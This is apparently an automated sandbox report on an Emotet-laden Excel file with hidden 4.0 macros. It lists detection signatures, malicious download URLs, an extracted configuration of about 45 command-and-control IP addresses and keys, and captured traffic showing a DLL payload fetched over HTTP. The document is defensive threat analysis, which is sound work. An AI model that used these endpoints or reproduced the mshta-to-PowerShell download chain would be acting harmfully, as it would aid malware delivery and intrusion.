Windows Analysis Report
2022-28-01_1203.xls

Overview

General Information

Sample Name: 2022-28-01_1203.xls
Analysis ID: 562523
MD5: 37c24f67577e3d2ec4b2dc99dac0c945
SHA1: 12beba3b1b5d2f9fbc173912ddd96af132f2fdda
SHA256: 80640acf5225beaf70c891a63dfeab8b6c4c1cc16e3ea8ebbc4938a6712f3114
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html# Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.pngPE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://it-o.biz/ Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlHn? Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlngs Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlb Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://91.240.118.172 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlfunction Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.p Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 15.2.rundll32.exe.2380000.7.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: 2022-28-01_1203.xls Virustotal: Detection: 11% Perma Link
Source: 2022-28-01_1203.xls ReversingLabs: Detection: 11%
Multi AV Scanner detection for domain / URL
Source: hostfeeling.com Virustotal: Detection: 10% Perma Link
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Virustotal: Detection: 12% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbK source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: hostfeeling.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 23:11:43 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f4782fa96f3=1643411503; expires=Fri, 28-Jan-2022 23:12:43 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 23:11:43 GMTExpires: Fri, 28 Jan 2022 23:11:43 GMTContent-Disposition: attachment; filename="S2TSbn.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.426855957.000000000051E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424251080.00000000030BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.426834292.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html#
Source: 2022-28-01_1203.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.427015746.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.407795337.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424598162.00000000005D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlHn?
Source: mshta.exe, 00000004.00000002.426834292.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000002.426735689.0000000000346000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
Source: mshta.exe, 00000004.00000003.409804198.000000000292D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.409352023.0000000002925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.426834292.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.426855957.000000000051E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.672379246.000000001B577000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.671154291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.664857308.0000000000120000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.664857308.0000000000120000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.424574812.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425122041.0000000003027000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
